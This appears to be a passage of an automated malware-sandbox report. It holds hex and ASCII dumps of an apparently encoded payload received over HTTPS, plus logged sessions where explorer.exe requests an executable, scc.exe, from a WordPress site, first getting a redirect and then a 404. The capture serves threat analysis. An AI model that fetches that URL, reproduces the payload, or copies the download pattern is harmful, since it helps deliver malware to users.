                                                                                                                                  2021-12-18 14:32:00 UTC240INData Raw: f7 21 c8 63 65 ea 30 c6 60 89 b3 94 0b 02 6b 95 89 e7 85 7a 13 dc b2 30 2c dd 39 e5 74 0d 9f c0 2c 2f 86 bf f5 bb 47 a5 82 95 e6 5b 4b 4b e1 f5 d2 db 73 40 6e be fe d9 38 eb aa 8e ca 99 e5 08 84 c9 77 20 83 96 a5 f2 68 0f 00 30 d3 f9 b3 8a 10 02 a4 e7 92 6c aa ed 0d fb 2f 13 f5 32 49 7a fd 39 4f 37 13 1a c8 ad d9 10 de ef 4c 6b b9 b7 d2 a4 06 99 e5 81 5c c7 1b ad 8c 69 1b a8 cb 94 21 9f 77 fc 22 de cb 81 a6 d4 a8 8e fa ec ed 25 31 54 e4 6f 76 e5 c5 2d ed d1 14 51 dd 55 bf 0a 22 eb a6 27 80 73 72 cb 3c ad ed a5 71 4a 6a d4 0b 56 0f 0c 52 87 ef 68 4e dc 9e 4e 43 7e 07 22 e3 c3 4c c1 55 96 8a 57 98 76 a3 5a 0d fb 4b 20 fd ac e8 cb 75 5a 59 d8 51 eb 07 e0 38 47 bd ba a0 ec 4c 93 f9 d6 18 8b a1 77 6f fc b1 fa 09 67 45 1f 23 6a 17 5b a9 3f 96 6b 9a fc 3e 93 2b
                                                                                                                                  Data Ascii: !ce0`kz0,9t,/G[KKs@n8w h0l/2Iz9O7Lk\i!w"%1Tov-QU"'sr<qJjVRhNNC~"LUWvZK uZYQ8GLwogE#j[?k>+
                                                                                                                                  2021-12-18 14:32:00 UTC256INData Raw: 5a 00 78 00 61 00 72 00 44 00 67 00 79 00 34 00 75 00 52 00 65 00 4e 00 4b 00 63 00 49 00 6e 00 68 00 39 00 74 00 44 00 30 00 4f 00 4f 00 59 00 32 00 4b 00 6b 00 33 00 37 00 4f 00 2f 00 57 00 4b 00 41 00 47 00 74 00 6a 00 62 00 35 00 48 00 50 00 67 00 33 00 6b 00 54 00 53 00 4b 00 47 00 79 00 69 00 33 00 4e 00 65 00 39 00 4b 00 30 00 64 00 59 00 7a 00 32 00 6d 00 49 00 69 00 55 00 44 00 45 00 74 00 51 00 33 00 61 00 35 00 37 00 78 00 6e 00 6d 00 4a 00 41 00 58 00 78 00 41 00 78 00 34 00 53 00 49 00 79 00 58 00 59 00 6a 00 6e 00 70 00 43 00 54 00 5a 00 49 00 76 00 4d 00 6f 00 64 00 69 00 6f 00 63 00 57 00 34 00 58 00 4e 00 65 00 62 00 63 00 41 00 70 00 68 00 53 00 4c 00 65 00 73 00 64 00 43 00 48 00 34 00 4e 00 5a 00 42 00 55 00 4b 00 54 00 6d 00 30 00 41
                                                                                                                                  Data Ascii: ZxarDgy4uReNKcInh9tD0OOY2Kk37O/WKAGtjb5HPg3kTSKGyi3Ne9K0dYz2mIiUDEtQ3a57xnmJAXxAx4SIyXYjnpCTZIvModiocW4XNebcAphSLesdCH4NZBUKTm0A
                                                                                                                                  2021-12-18 14:32:00 UTC272INData Raw: 35 00 49 00 32 00 70 00 68 00 79 00 46 00 2f 00 48 00 52 00 56 00 41 00 47 00 52 00 4b 00 52 00 32 00 39 00 56 00 4b 00 43 00 74 00 44 00 67 00 74 00 4a 00 57 00 69 00 55 00 71 00 6b 00 35 00 6d 00 67 00 50 00 5a 00 71 00 66 00 32 00 43 00 74 00 5a 00 36 00 6a 00 42 00 49 00 34 00 4a 00 2b 00 4d 00 35 00 30 00 73 00 64 00 39 00 73 00 62 00 47 00 57 00 6a 00 36 00 36 00 50 00 42 00 42 00 4c 00 78 00 47 00 66 00 57 00 66 00 70 00 72 00 56 00 30 00 33 00 58 00 58 00 30 00 79 00 42 00 45 00 61 00 4a 00 57 00 43 00 66 00 57 00 54 00 39 00 73 00 6d 00 6a 00 53 00 4f 00 49 00 52 00 51 00 74 00 37 00 76 00 69 00 35 00 64 00 43 00 47 00 71 00 59 00 79 00 47 00 4a 00 53 00 38 00 66 00 77 00 6b 00 4e 00 63 00 6a 00 55 00 4f 00 37 00 61 00 64 00 7a 00 54 00 79 00 34
                                                                                                                                  Data Ascii: 5I2phyF/HRVAGRKR29VKCtDgtJWiUqk5mgPZqf2CtZ6jBI4J+M50sd9sbGWj66PBBLxGfWfprV03XX0yBEaJWCfWT9smjSOIRQt7vi5dCGqYyGJS8fwkNcjUO7adzTy4
                                                                                                                                  2021-12-18 14:32:00 UTC288INData Raw: 4b 00 67 00 73 00 56 00 31 00 30 00 54 00 4f 00 73 00 77 00 41 00 4f 00 56 00 6a 00 43 00 74 00 34 00 39 00 48 00 49 00 72 00 65 00 2f 00 66 00 54 00 5a 00 34 00 6c 00 75 00 4e 00 30 00 71 00 33 00 35 00 65 00 44 00 78 00 6b 00 76 00 45 00 34 00 76 00 7a 00 49 00 43 00 35 00 32 00 47 00 32 00 6b 00 4c 00 4a 00 6d 00 4f 00 57 00 73 00 38 00 31 00 43 00 4c 00 7a 00 4e 00 55 00 44 00 67 00 43 00 75 00 54 00 75 00 73 00 39 00 50 00 39 00 51 00 37 00 33 00 65 00 77 00 32 00 75 00 4c 00 57 00 4d 00 68 00 32 00 37 00 41 00 36 00 39 00 6c 00 4d 00 63 00 55 00 62 00 71 00 45 00 61 00 6a 00 57 00 75 00 66 00 58 00 57 00 33 00 32 00 73 00 42 00 54 00 4d 00 66 00 42 00 70 00 52 00 4e 00 65 00 4e 00 36 00 4f 00 48 00 72 00 2f 00 68 00 6c 00 45 00 32 00 6b 00 77 00 77
                                                                                                                                  Data Ascii: KgsV10TOswAOVjCt49HIre/fTZ4luN0q35eDxkvE4vzIC52G2kLJmOWs81CLzNUDgCuTus9P9Q73ew2uLWMh27A69lMcUbqEajWufXW32sBTMfBpRNeN6OHr/hlE2kww
                                                                                                                                  2021-12-18 14:32:00 UTC304INData Raw: 75 00 57 00 68 00 46 00 65 00 64 00 42 00 36 00 5a 00 43 00 39 00 45 00 39 00 6c 00 7a 00 42 00 55 00 57 00 59 00 37 00 6d 00 78 00 57 00 6e 00 32 00 76 00 46 00 33 00 74 00 71 00 46 00 69 00 4c 00 39 00 66 00 62 00 43 00 7a 00 57 00 68 00 65 00 38 00 30 00 38 00 4d 00 55 00 32 00 67 00 45 00 59 00 6f 00 2b 00 41 00 6d 00 31 00 74 00 42 00 31 00 30 00 46 00 55 00 77 00 57 00 2b 00 58 00 6a 00 39 00 67 00 41 00 31 00 58 00 59 00 71 00 51 00 33 00 74 00 6f 00 66 00 75 00 64 00 41 00 61 00 73 00 67 00 54 00 35 00 73 00 47 00 44 00 47 00 61 00 77 00 50 00 6d 00 4f 00 4d 00 6f 00 63 00 6e 00 45 00 48 00 37 00 6b 00 79 00 43 00 58 00 47 00 45 00 44 00 35 00 49 00 30 00 67 00 6c 00 76 00 43 00 70 00 58 00 37 00 41 00 78 00 44 00 38 00 42 00 2b 00 32 00 4a 00 6f
                                                                                                                                  Data Ascii: uWhFedB6ZC9E9lzBUWY7mxWn2vF3tqFiL9fbCzWhe808MU2gEYo+Am1tB10FUwW+Xj9gA1XYqQ3tofudAasgT5sGDGawPmOMocnEH7kyCXGED5I0glvCpX7AxD8B+2Jo
                                                                                                                                  2021-12-18 14:32:00 UTC320INData Raw: 52 00 4d 00 62 00 65 00 41 00 33 00 71 00 59 00 4a 00 69 00 2f 00 67 00 6b 00 35 00 64 00 64 00 59 00 6a 00 33 00 32 00 2b 00 50 00 57 00 54 00 67 00 62 00 58 00 70 00 30 00 6b 00 65 00 32 00 59 00 57 00 36 00 58 00 35 00 70 00 62 00 76 00 38 00 62 00 72 00 44 00 46 00 47 00 49 00 79 00 4f 00 34 00 36 00 52 00 37 00 65 00 71 00 67 00 4a 00 78 00 65 00 65 00 42 00 36 00 61 00 5a 00 59 00 39 00 68 00 64 00 70 00 4d 00 77 00 6a 00 36 00 6f 00 70 00 4d 00 33 00 4d 00 6c 00 30 00 56 00 6e 00 71 00 7a 00 50 00 70 00 6c 00 4f 00 71 00 7a 00 71 00 6f 00 2b 00 75 00 68 00 69 00 42 00 5a 00 61 00 6c 00 37 00 35 00 2b 00 34 00 44 00 34 00 2f 00 42 00 74 00 66 00 79 00 37 00 61 00 46 00 41 00 37 00 5a 00 6c 00 63 00 46 00 4d 00 57 00 67 00 44 00 48 00 7a 00 68 00 53
                                                                                                                                  Data Ascii: RMbeA3qYJi/gk5ddYj32+PWTgbXp0ke2YW6X5pbv8brDFGIyO46R7eqgJxeeB6aZY9hdpMwj6opM3Ml0VnqzPplOqzqo+uhiBZal75+4D4/Btfy7aFA7ZlcFMWgDHzhS
                                                                                                                                  2021-12-18 14:32:00 UTC336INData Raw: 76 00 6c 00 59 00 61 00 5a 00 73 00 76 00 6b 00 75 00 6e 00 2f 00 31 00 74 00 62 00 65 00 32 00 46 00 77 00 70 00 61 00 4f 00 39 00 4b 00 72 00 52 00 51 00 38 00 53 00 46 00 73 00 42 00 6a 00 47 00 2f 00 2b 00 4e 00 44 00 75 00 33 00 55 00 75 00 30 00 41 00 79 00 37 00 50 00 46 00 47 00 4d 00 4f 00 6c 00 30 00 54 00 72 00 74 00 33 00 69 00 31 00 71 00 6a 00 74 00 6c 00 45 00 6a 00 67 00 32 00 78 00 34 00 49 00 71 00 42 00 32 00 5a 00 65 00 75 00 41 00 71 00 66 00 44 00 59 00 4c 00 30 00 6e 00 34 00 65 00 35 00 46 00 2b 00 58 00 78 00 75 00 6f 00 56 00 71 00 43 00 70 00 44 00 41 00 35 00 51 00 4a 00 74 00 53 00 72 00 5a 00 74 00 53 00 77 00 32 00 32 00 4b 00 39 00 34 00 70 00 39 00 31 00 59 00 6e 00 47 00 75 00 68 00 6d 00 79 00 41 00 63 00 4d 00 35 00 63
                                                                                                                                  Data Ascii: vlYaZsvkun/1tbe2FwpaO9KrRQ8SFsBjG/+NDu3Uu0Ay7PFGMOl0Trt3i1qjtlEjg2x4IqB2ZeuAqfDYL0n4e5F+XxuoVqCpDA5QJtSrZtSw22K94p91YnGuhmyAcM5c
                                                                                                                                  2021-12-18 14:32:00 UTC352INData Raw: 74 00 57 00 61 00 57 00 37 00 4b 00 4c 00 54 00 64 00 78 00 4d 00 56 00 63 00 4f 00 79 00 69 00 62 00 64 00 4b 00 59 00 4e 00 5a 00 6e 00 72 00 58 00 5a 00 4b 00 56 00 73 00 61 00 56 00 56 00 2f 00 43 00 53 00 46 00 6e 00 47 00 5a 00 37 00 31 00 6a 00 56 00 58 00 41 00 46 00 75 00 50 00 50 00 57 00 79 00 71 00 48 00 70 00 45 00 2f 00 45 00 64 00 53 00 64 00 43 00 34 00 61 00 47 00 4b 00 67 00 67 00 33 00 4c 00 47 00 4d 00 42 00 49 00 49 00 43 00 61 00 75 00 54 00 43 00 69 00 67 00 4c 00 6f 00 5a 00 54 00 67 00 61 00 41 00 65 00 59 00 50 00 5a 00 6c 00 44 00 53 00 70 00 34 00 63 00 2b 00 4b 00 4c 00 75 00 68 00 69 00 59 00 6e 00 59 00 68 00 70 00 68 00 48 00 30 00 50 00 30 00 51 00 49 00 34 00 6e 00 75 00 32 00 54 00 4f 00 2f 00 7a 00 71 00 6b 00 70 00 4a
                                                                                                                                  Data Ascii: tWaW7KLTdxMVcOyibdKYNZnrXZKVsaVV/CSFnGZ71jVXAFuPPWyqHpE/EdSdC4aGKgg3LGMBIICauTCigLoZTgaAeYPZlDSp4c+KLuhiYnYhphH0P0QI4nu2TO/zqkpJ
                                                                                                                                  2021-12-18 14:32:00 UTC368INData Raw: 2b 00 39 00 6b 00 75 00 4a 00 71 00 61 00 5a 00 4c 00 76 00 4d 00 54 00 53 00 71 00 32 00 4f 00 72 00 52 00 2f 00 37 00 74 00 78 00 70 00 6c 00 64 00 6b 00 31 00 62 00 32 00 59 00 48 00 47 00 75 00 2b 00 30 00 72 00 4c 00 76 00 79 00 59 00 51 00 62 00 6f 00 39 00 6d 00 70 00 67 00 59 00 73 00 77 00 52 00 69 00 59 00 32 00 63 00 32 00 6b 00 6a 00 4c 00 57 00 62 00 78 00 77 00 6e 00 48 00 54 00 38 00 33 00 6d 00 41 00 39 00 56 00 4d 00 53 00 2b 00 61 00 4d 00 67 00 4b 00 78 00 70 00 54 00 42 00 6e 00 6f 00 57 00 31 00 64 00 35 00 6b 00 46 00 36 00 2b 00 42 00 4f 00 67 00 6d 00 54 00 38 00 45 00 77 00 6b 00 67 00 6f 00 52 00 4c 00 47 00 54 00 48 00 79 00 4e 00 36 00 74 00 61 00 43 00 54 00 51 00 53 00 31 00 55 00 31 00 5a 00 69 00 78 00 66 00 6e 00 62 00 57
                                                                                                                                  Data Ascii: +9kuJqaZLvMTSq2OrR/7txpldk1b2YHGu+0rLvyYQbo9mpgYswRiY2c2kjLWbxwnHT83mA9VMS+aMgKxpTBnoW1d5kF6+BOgmT8EwkgoRLGTHyN6taCTQS1U1ZixfnbW
                                                                                                                                  2021-12-18 14:32:00 UTC384INData Raw: 6f 00 36 00 2f 00 77 00 36 00 62 00 64 00 76 00 34 00 72 00 6c 00 31 00 7a 00 33 00 4f 00 4f 00 62 00 67 00 51 00 79 00 67 00 2b 00 62 00 2b 00 42 00 2b 00 68 00 4d 00 37 00 53 00 52 00 45 00 53 00 43 00 33 00 79 00 38 00 4b 00 6f 00 71 00 30 00 36 00 45 00 65 00 73 00 33 00 4a 00 6a 00 30 00 61 00 64 00 4e 00 56 00 4c 00 50 00 2f 00 7a 00 74 00 75 00 58 00 79 00 51 00 6e 00 6e 00 62 00 74 00 61 00 46 00 76 00 4d 00 4f 00 67 00 78 00 49 00 7a 00 50 00 36 00 50 00 43 00 69 00 73 00 53 00 48 00 33 00 2f 00 58 00 39 00 62 00 71 00 30 00 69 00 47 00 4a 00 64 00 6d 00 39 00 6d 00 66 00 4b 00 38 00 54 00 30 00 69 00 74 00 66 00 35 00 64 00 4a 00 4f 00 63 00 35 00 43 00 6e 00 47 00 33 00 73 00 44 00 5a 00 74 00 6f 00 36 00 48 00 49 00 36 00 6b 00 56 00 38 00 31
                                                                                                                                  Data Ascii: o6/w6bdv4rl1z3OObgQyg+b+B+hM7SRESC3y8Koq06Ees3Jj0adNVLP/ztuXyQnnbtaFvMOgxIzP6PCisSH3/X9bq0iGJdm9mfK8T0itf5dJOc5CnG3sDZto6HI6kV81
                                                                                                                                  2021-12-18 14:32:00 UTC400INData Raw: 4c 00 4c 00 58 00 31 00 6d 00 51 00 53 00 45 00 46 00 53 00 44 00 70 00 2b 00 33 00 78 00 59 00 37 00 79 00 66 00 48 00 4c 00 4d 00 43 00 6b 00 61 00 31 00 44 00 63 00 71 00 65 00 6e 00 74 00 63 00 4f 00 35 00 56 00 47 00 69 00 52 00 45 00 43 00 4b 00 70 00 4f 00 7a 00 30 00 2f 00 62 00 36 00 46 00 47 00 45 00 5a 00 2b 00 6d 00 66 00 34 00 35 00 6c 00 42 00 30 00 76 00 33 00 67 00 74 00 57 00 4b 00 62 00 63 00 4d 00 61 00 51 00 6e 00 74 00 37 00 49 00 30 00 6f 00 71 00 68 00 2b 00 6b 00 47 00 48 00 4c 00 54 00 6c 00 6c 00 5a 00 59 00 4a 00 6d 00 2b 00 55 00 4b 00 58 00 43 00 2b 00 57 00 79 00 2b 00 4f 00 2f 00 74 00 47 00 42 00 6c 00 48 00 55 00 6a 00 6d 00 71 00 4a 00 4d 00 68 00 6c 00 45 00 4a 00 72 00 41 00 45 00 4f 00 6a 00 39 00 4d 00 79 00 37 00 55
                                                                                                                                  Data Ascii: LLX1mQSEFSDp+3xY7yfHLMCka1DcqentcO5VGiRECKpOz0/b6FGEZ+mf45lB0v3gtWKbcMaQnt7I0oqh+kGHLTllZYJm+UKXC+Wy+O/tGBlHUjmqJMhlEJrAEOj9My7U
                                                                                                                                  2021-12-18 14:32:00 UTC416INData Raw: 4e 00 6d 00 6b 00 4b 00 78 00 6d 00 58 00 30 00 5a 00 46 00 37 00 71 00 78 00 6f 00 45 00 46 00 4d 00 72 00 4d 00 73 00 6f 00 2b 00 54 00 6f 00 67 00 70 00 73 00 51 00 45 00 4d 00 2b 00 41 00 6a 00 4a 00 62 00 50 00 32 00 55 00 2b 00 2f 00 37 00 50 00 57 00 53 00 48 00 6d 00 65 00 50 00 47 00 30 00 63 00 44 00 66 00 37 00 33 00 2b 00 70 00 33 00 73 00 64 00 54 00 4c 00 58 00 69 00 35 00 35 00 63 00 56 00 53 00 4d 00 65 00 35 00 6f 00 62 00 6d 00 46 00 6e 00 67 00 79 00 74 00 6a 00 31 00 41 00 78 00 6e 00 35 00 76 00 4f 00 58 00 4e 00 72 00 4b 00 51 00 46 00 74 00 51 00 79 00 74 00 76 00 55 00 6f 00 6c 00 77 00 2b 00 43 00 30 00 6e 00 79 00 75 00 43 00 44 00 63 00 70 00 4b 00 4a 00 46 00 75 00 75 00 66 00 4a 00 4b 00 44 00 33 00 2f 00 67 00 6b 00 37 00 39
                                                                                                                                  Data Ascii: NmkKxmX0ZF7qxoEFMrMso+TogpsQEM+AjJbP2U+/7PWSHmePG0cDf73+p3sdTLXi55cVSMe5obmFngytj1Axn5vOXNrKQFtQytvUolw+C0nyuCDcpKJFuufJKD3/gk79
                                                                                                                                  2021-12-18 14:32:00 UTC432INData Raw: 69 00 62 00 67 00 65 00 50 00 6a 00 4a 00 38 00 72 00 30 00 4c 00 72 00 54 00 72 00 44 00 4e 00 62 00 45 00 69 00 42 00 66 00 75 00 50 00 78 00 47 00 73 00 75 00 42 00 32 00 57 00 76 00 62 00 37 00 77 00 48 00 35 00 65 00 33 00 70 00 34 00 70 00 50 00 31 00 54 00 68 00 36 00 41 00 74 00 6c 00 4d 00 36 00 37 00 58 00 32 00 66 00 78 00 7a 00 50 00 6e 00 6d 00 35 00 4a 00 77 00 61 00 50 00 6f 00 78 00 6a 00 42 00 36 00 48 00 6e 00 53 00 53 00 35 00 77 00 4a 00 63 00 72 00 4b 00 59 00 65 00 47 00 74 00 6f 00 4a 00 43 00 53 00 2f 00 39 00 4b 00 61 00 70 00 49 00 49 00 57 00 79 00 66 00 41 00 76 00 30 00 30 00 70 00 32 00 4a 00 48 00 71 00 49 00 69 00 59 00 2b 00 63 00 7a 00 2f 00 4c 00 63 00 69 00 6a 00 51 00 73 00 4a 00 7a 00 41 00 45 00 74 00 57 00 73 00 38
                                                                                                                                  Data Ascii: ibgePjJ8r0LrTrDNbEiBfuPxGsuB2Wvb7wH5e3p4pP1Th6AtlM67X2fxzPnm5JwaPoxjB6HnSS5wJcrKYeGtoJCS/9KapIIWyfAv00p2JHqIiY+cz/LcijQsJzAEtWs8
                                                                                                                                  2021-12-18 14:32:00 UTC448INData Raw: 45 00 55 00 5a 00 4a 00 6f 00 31 00 4b 00 4a 00 43 00 69 00 76 00 59 00 75 00 57 00 6a 00 35 00 55 00 69 00 70 00 6c 00 77 00 69 00 34 00 4b 00 68 00 48 00 65 00 77 00 65 00 57 00 77 00 77 00 66 00 41 00 55 00 36 00 63 00 50 00 55 00 4c 00 63 00 43 00 74 00 62 00 62 00 33 00 2f 00 69 00 68 00 6d 00 48 00 2b 00 4e 00 5a 00 52 00 4a 00 6b 00 4d 00 71 00 70 00 66 00 2f 00 65 00 50 00 6e 00 35 00 2b 00 35 00 30 00 47 00 63 00 41 00 77 00 70 00 30 00 6d 00 48 00 43 00 6e 00 62 00 35 00 47 00 42 00 34 00 6e 00 4a 00 56 00 64 00 62 00 42 00 46 00 41 00 72 00 50 00 2f 00 55 00 47 00 64 00 4f 00 75 00 6b 00 77 00 44 00 58 00 30 00 36 00 61 00 50 00 68 00 54 00 6c 00 75 00 75 00 53 00 36 00 6c 00 5a 00 6c 00 70 00 2b 00 41 00 55 00 67 00 55 00 6e 00 67 00 53 00 38
                                                                                                                                  Data Ascii: EUZJo1KJCivYuWj5Uiplwi4KhHeweWwwfAU6cPULcCtbb3/ihmH+NZRJkMqpf/ePn5+50GcAwp0mHCnb5GB4nJVdbBFArP/UGdOukwDX06aPhTluuS6lZlp+AUgUngS8
                                                                                                                                  2021-12-18 14:32:00 UTC464INData Raw: 59 00 43 00 78 00 44 00 65 00 41 00 39 00 63 00 6b 00 74 00 6d 00 44 00 44 00 6a 00 34 00 49 00 48 00 72 00 42 00 6d 00 41 00 79 00 61 00 51 00 2f 00 4b 00 48 00 36 00 4e 00 32 00 74 00 58 00 46 00 49 00 61 00 4b 00 4d 00 71 00 62 00 4c 00 68 00 6f 00 6b 00 2f 00 35 00 37 00 6a 00 6f 00 4e 00 4d 00 78 00 63 00 59 00 37 00 46 00 51 00 35 00 70 00 47 00 79 00 6f 00 63 00 4b 00 4c 00 50 00 73 00 6e 00 6a 00 6c 00 33 00 32 00 51 00 6f 00 6b 00 44 00 47 00 6c 00 4b 00 4f 00 56 00 57 00 65 00 6c 00 76 00 68 00 71 00 52 00 31 00 68 00 39 00 6e 00 6a 00 53 00 7a 00 63 00 78 00 55 00 53 00 35 00 73 00 61 00 31 00 56 00 6e 00 6b 00 73 00 46 00 56 00 7a 00 66 00 56 00 31 00 2f 00 2b 00 65 00 6b 00 4f 00 61 00 67 00 59 00 51 00 58 00 39 00 61 00 49 00 46 00 4a 00 74
                                                                                                                                  Data Ascii: YCxDeA9cktmDDj4IHrBmAyaQ/KH6N2tXFIaKMqbLhok/57joNMxcY7FQ5pGyocKLPsnjl32QokDGlKOVWelvhqR1h9njSzcxUS5sa1VnksFVzfV1/+ekOagYQX9aIFJt
                                                                                                                                  2021-12-18 14:32:00 UTC480INData Raw: 75 00 34 00 57 00 2f 00 65 00 45 00 62 00 43 00 49 00 30 00 46 00 4e 00 49 00 6e 00 61 00 57 00 42 00 75 00 33 00 55 00 75 00 73 00 77 00 41 00 2b 00 71 00 65 00 30 00 4e 00 41 00 48 00 35 00 2f 00 74 00 4a 00 6c 00 32 00 31 00 58 00 76 00 53 00 51 00 46 00 74 00 71 00 61 00 6e 00 57 00 6c 00 48 00 31 00 41 00 78 00 70 00 48 00 68 00 45 00 58 00 6a 00 61 00 4e 00 6a 00 65 00 46 00 4f 00 72 00 68 00 62 00 30 00 59 00 59 00 59 00 7a 00 58 00 75 00 61 00 47 00 46 00 6c 00 56 00 48 00 2f 00 4e 00 74 00 64 00 4f 00 53 00 57 00 54 00 43 00 55 00 70 00 4c 00 4e 00 65 00 31 00 64 00 34 00 66 00 48 00 72 00 6e 00 73 00 6e 00 43 00 42 00 52 00 30 00 42 00 64 00 63 00 77 00 76 00 50 00 47 00 35 00 58 00 67 00 36 00 73 00 53 00 4f 00 6e 00 38 00 4b 00 4e 00 75 00 42
                                                                                                                                  Data Ascii: u4W/eEbCI0FNInaWBu3UuswA+qe0NAH5/tJl21XvSQFtqanWlH1AxpHhEXjaNjeFOrhb0YYYzXuaGFlVH/NtdOSWTCUpLNe1d4fHrnsnCBR0BdcwvPG5Xg6sSOn8KNuB
                                                                                                                                  2021-12-18 14:32:00 UTC496INData Raw: 51 00 53 00 4d 00 7a 00 33 00 4d 00 37 00 51 00 53 00 4f 00 6d 00 48 00 56 00 36 00 34 00 2b 00 65 00 48 00 41 00 4c 00 5a 00 42 00 65 00 74 00 4c 00 6f 00 39 00 51 00 61 00 5a 00 71 00 62 00 74 00 6c 00 59 00 2b 00 30 00 65 00 31 00 6a 00 58 00 78 00 71 00 38 00 52 00 41 00 50 00 2b 00 43 00 6b 00 6f 00 76 00 68 00 2f 00 39 00 53 00 41 00 75 00 49 00 35 00 30 00 32 00 39 00 65 00 55 00 4c 00 76 00 65 00 65 00 6b 00 6f 00 7a 00 4c 00 4b 00 54 00 54 00 45 00 38 00 77 00 7a 00 70 00 78 00 42 00 61 00 76 00 61 00 78 00 6e 00 35 00 4d 00 75 00 4c 00 74 00 38 00 41 00 6c 00 61 00 72 00 57 00 2f 00 4f 00 79 00 6e 00 76 00 63 00 35 00 77 00 76 00 32 00 66 00 5a 00 4a 00 36 00 73 00 44 00 75 00 30 00 53 00 2b 00 31 00 6e 00 34 00 67 00 37 00 67 00 42 00 46 00 58
                                                                                                                                  Data Ascii: QSMz3M7QSOmHV64+eHALZBetLo9QaZqbtlY+0e1jXxq8RAP+Ckovh/9SAuI5029eULveekozLKTTE8wzpxBavaxn5MuLt8AlarW/Oynvc5wv2fZJ6sDu0S+1n4g7gBFX
                                                                                                                                  2021-12-18 14:32:00 UTC512INData Raw: 74 00 66 00 58 00 6c 00 36 00 57 00 75 00 38 00 63 00 4d 00 62 00 7a 00 54 00 4a 00 59 00 67 00 4e 00 70 00 7a 00 30 00 2f 00 61 00 57 00 57 00 54 00 6b 00 61 00 2b 00 4f 00 67 00 37 00 48 00 30 00 46 00 56 00 54 00 57 00 73 00 54 00 72 00 6c 00 33 00 75 00 36 00 6e 00 55 00 6d 00 64 00 59 00 65 00 37 00 58 00 4b 00 66 00 51 00 63 00 67 00 6f 00 45 00 75 00 64 00 56 00 70 00 70 00 6a 00 2b 00 6e 00 35 00 48 00 30 00 62 00 51 00 6d 00 4a 00 68 00 31 00 72 00 51 00 67 00 6c 00 45 00 69 00 72 00 6c 00 69 00 52 00 38 00 6e 00 71 00 52 00 4d 00 4e 00 61 00 6b 00 72 00 37 00 4d 00 4e 00 55 00 48 00 43 00 50 00 71 00 68 00 30 00 77 00 52 00 6b 00 4b 00 66 00 4f 00 45 00 56 00 6c 00 45 00 43 00 55 00 7a 00 4e 00 43 00 72 00 51 00 64 00 49 00 45 00 33 00 32 00 4b
                                                                                                                                  Data Ascii: tfXl6Wu8cMbzTJYgNpz0/aWWTka+Og7H0FVTWsTrl3u6nUmdYe7XKfQcgoEudVppj+n5H0bQmJh1rQglEirliR8nqRMNakr7MNUHCPqh0wRkKfOEVlECUzNCrQdIE32K
                                                                                                                                  2021-12-18 14:32:00 UTC528INData Raw: 58 00 72 00 55 00 57 00 74 00 79 00 74 00 44 00 6d 00 48 00 47 00 6b 00 6a 00 6f 00 2f 00 44 00 44 00 47 00 6e 00 45 00 51 00 71 00 35 00 65 00 6c 00 36 00 38 00 41 00 4a 00 34 00 50 00 31 00 46 00 59 00 56 00 2f 00 56 00 73 00 49 00 70 00 78 00 48 00 74 00 4a 00 6f 00 77 00 76 00 55 00 48 00 55 00 78 00 46 00 57 00 70 00 71 00 75 00 73 00 69 00 45 00 45 00 4c 00 76 00 65 00 64 00 75 00 66 00 58 00 5a 00 54 00 58 00 6b 00 79 00 37 00 67 00 33 00 55 00 6b 00 56 00 77 00 49 00 70 00 79 00 52 00 54 00 45 00 2b 00 49 00 57 00 70 00 52 00 43 00 48 00 43 00 4f 00 64 00 54 00 56 00 33 00 41 00 4d 00 2b 00 6b 00 78 00 65 00 63 00 58 00 6b 00 33 00 30 00 58 00 38 00 6a 00 72 00 51 00 6b 00 4c 00 53 00 76 00 39 00 42 00 52 00 71 00 2f 00 32 00 68 00 73 00 42 00 41
                                                                                                                                  Data Ascii: XrUWtytDmHGkjo/DDGnEQq5el68AJ4P1FYV/VsIpxHtJowvUHUxFWpqusiEELvedufXZTXky7g3UkVwIpyRTE+IWpRCHCOdTV3AM+kxecXk30X8jrQkLSv9BRq/2hsBA


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  1192.168.2.64983050.62.140.96443C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2021-12-18 14:32:13 UTC534OUTGET /veldolore/scc.exe HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Host: bastinscustomfab.com
                                                                                                                                  2021-12-18 14:32:13 UTC534INHTTP/1.1 301 Moved Permanently
                                                                                                                                  Date: Sat, 18 Dec 2021 14:32:13 GMT
                                                                                                                                  Server: Apache
                                                                                                                                  X-Powered-By: PHP/7.3.33
                                                                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                  X-Redirect-By: WordPress
                                                                                                                                  Set-Cookie: PHPSESSID=905f1348cca402f214daeb63de69114c; path=/
                                                                                                                                  Upgrade: h2,h2c
                                                                                                                                  Connection: Upgrade, close
                                                                                                                                  Location: https://www.bastinscustomfab.com/veldolore/scc.exe
                                                                                                                                  Content-Length: 0
                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  2192.168.2.64983150.62.140.96443C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2021-12-18 14:32:14 UTC534OUTGET /veldolore/scc.exe HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Host: www.bastinscustomfab.com
                                                                                                                                  Cookie: PHPSESSID=905f1348cca402f214daeb63de69114c
                                                                                                                                  2021-12-18 14:32:15 UTC535INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Sat, 18 Dec 2021 14:32:14 GMT
                                                                                                                                  Server: Apache
                                                                                                                                  X-Powered-By: PHP/7.3.33
                                                                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                  Link: <https://www.bastinscustomfab.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                  Upgrade: h2,h2c
                                                                                                                                  Connection: Upgrade, close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Content-Type: text/html; charset=UTF-8
